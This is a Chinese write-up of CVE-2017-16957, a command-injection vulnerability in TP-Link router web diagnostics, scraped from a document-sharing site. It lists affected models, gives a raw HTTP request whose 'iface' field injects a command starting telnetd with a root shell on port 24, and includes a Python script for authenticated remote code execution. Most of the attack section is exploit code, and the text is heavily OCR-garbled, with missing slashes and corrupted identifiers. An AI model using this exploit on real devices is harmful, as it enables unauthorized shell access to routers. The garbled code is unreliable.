《(CVE-2017-16957)TP-Link 命令注入漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2017-16957)TP-Link 命令注入漏洞.docx(19页珍藏版)》请在优知文库上搜索。
1、(CVE-2017-16957) TPLink 命令注入漏洞一、漏洞简介TP-LinkTL-WVR等都是中国普联(TP-LINK)公司的无线路由器产品。多款TP-Link产品中存在命令注入漏洞。远程攻击者可通过向cgi-bin/luci发送 face字段中带有shell元字符的admin/diagnostic命令利用该漏洞执行任意命令。二、漏洞影响TP-LINK TL-WVR TP-LINK TL-WVR300 v4 TP-LINK TL-WVR302 v2 TP-LINK TL- WVR450 TP-LINK TL-WVR450L TP-LINK TL-WVR450G v5 TP-LINK
2、TL-WVR458 TP-LINK TL-WVR458L TP-LINK TL-WVR458P TP-LINK TL-WVR900G v3 TP-LINK TL-WVR1200L TP-LINK TL-WVR900L TP-LINK TL-WVR1300L TP-LINK TL- WVR1300G TP-LINK TL-WVR1750L TP-LINK TL-WVR2600L TP-LINK TL- WVR4300L TP-LINK TL-WAR450 TP-LINK TL-WAR302 TP-LINK TL-WAR2600L TP- LINK TL-WAR1750L TP-LINK TL-W
3、AR1300L TP-LINK TL-WAR1200L TP-LINK TL- WAR900L TP-LINK TL-WAR458 TP-LINK TL-WAR450L TP-LINK TL-ER5510G v2 TP-LINK TL-ER5510G v3 TP-LINK TL-ER5520G v2 TP-LINK TL-ER5520G v3 TP- LINK TL-ER6120G v2 TP-LlNK TL-ER6520G v2 TP-LINK TL-ER6520G v3 TP-LINK TL-ER3210G TP-LINK TL-ER7520G TP-LINK TL-ER6520G TP-
4、LINK TL-ER6510G TP- LINKTL-ER6220G TP-LINK TL-ER6120G TP-LINK TL-ER6110G TP-LINK TL- ER5120G TP-LINK TL-ER5110G TP-LINK TL-ER3220G TP-LINK TL-R479P-AC TP- LINK TL-R478G+ TP-LINK TL-R478G TP-LINK TL-R478+ TP-LINK TL-R478 TP-LINK TL-R473GP-AC TP-LINK TL-R473P-AC TP-LINK TL-R473G TP-LINK TL-R473 TP- LI
5、NKTL-R4299G TP-LINK TL-R4239G TP-LINK TL-R4149G TP-LINK TL-R488 TP- LINK TL-R483 TP-LINK TL-R483G TP-LINK TL-R479GP-AC TP-LlNK TL-R479GPE- AC三、复现过程POST cgi-bin/luciJstok=ea2178b4514da7ae227f4ecl92536930admindiagnos tic?form=diag HTTP1.1Host: 0-sec.orgContent-Length: 370Accept: applicationjsonj text/
6、javascript, */*; q=0.01 Origin: http:/192.168.3.1 X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; 64) AppleWebKit/537.3 6 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http:/192.168.3.1/
7、webpages/index.html Accept-Encoding: gzip, deflateCookie: Sysauth=be9b6f2b4b9a76a8a658el08c6197f2c Connection: closedata=%7B%22method%22%3A%22start%22%2C%22params%22%3A%7B%22type%22%3A%22 0%22%2C%22type_hidden%22%3A%220%22%2C%22ipaddr_ping%22%3A%2 2%2C%22iface-ping%22%3A%22WANl%22%2C%22ipaddr%22%3A%
8、22%2C%2 2iface%22%3A%22%3Btelnetd+-p+24+-l+binsh%22%2C%22count%22%3A%221%22%2 C%22pktsize%22%3A%2264%22%2C%22my-result%22%3A%22The+Router+is+ready.%5 Cr%5Cn%22%7D%7D漏洞脚本# Tested product: TL-WVR450L# Hardware version: VI.0# Firmware version: 20161125# The RSA_Encryption_For_Tplink.js is use for Rsa E
9、ncryption to the pas sword when login the web manager.# You can download the RSA_Encryption_For_Tplink.js by https:/github.c omcoincoin7Wireless-Router-Vulnerability/blob/master/RSA_Encryption_F OjTplink jsimport execjsimport requestsimport jsonimport urllib def read_js():file = open(,. /RSA_Encrypt
10、ion_For_Tplink. js, , r,) line = file.readline()js =while line:js = js + lineline = file.readline()file.close()return js def eecute(ipj port, username, passwdj cmd):try:s = requests. session()uri = http:/:.format (ip, port)headers = Content-Type,:,application/x-www-form-urlencoded; charset= UTF-8,Re
11、ferer1: httprwebpageslogin.html.format(ip)payload = method :get,ret = s.post(uri + ,cgi-binluci;Stok=ZloginPform=Iogin,j dat a=urllib.urlencode(data:json.dumps(payload), headers=headers, time out=5)rsa_public_n = json.loads(ret.text)resultpassword0.en codeCutf-S)rsa_public_e = json.loads(ret.text),r
12、esult,password,1.en code(utf-8)js = read_js()js_handle = pile(js)password = js_handle.call(MainEncrypt, rsa_public_n, rsa_publ ic_e, passwd)payload method:login,params:username:, .format (username)jpassword: .format(password)ret = s.post(uri + ,cgi-binluci;Stok=ZloginPform=Iogin, dat a=rllib.urlenco
13、de(data:json.dumps(payload), headers=headersj time out=5)stok = json.loads(ret.text)result,stok,. encode(utf-8,)cookie = ret.headersSet-Cookie1print ,+ Login success, print ,+ Get The Token: + stok print ,+ Get The Cookie: , + cookieheaders = Content-Type,:application/x-www-form-urlencoded; charset=
14、 UTF-8,Referer:,httpzwebpageslogin.html,. format (ip)j Cookie:,.format(cookie) payload = method:start,params:typez0,type-hiddenz,0ipaddr_ping:127.0.0.1,iface-ping,r,WANl,ipaddri,127.0.0.1, ,iface format (cmd), “count: T,“pktsize”:“64”, ,my-resulti,exploit)ret = s.post(uri + ,cgi-binluci;stok=/admin/
15、diagnostic?for m=diag.format(stok), data=urllib.urlencode(data:json.dumps(payloa d), headers=headers, timeout=5)#print ret.textprint + Finish RCEprint ,return Trueexcept:return False if _name_=_main_:print ,Tplink LUCI diagnostic Authenticated RCEIprint execute(,192.168.1.1,j 80j ,admin,i admin,i telnetd -p 24 - 1 binsh,)RSA_Encryption_For_Tplink.js 文件/ Copyright (c) 2005 Tom WU/ All Righ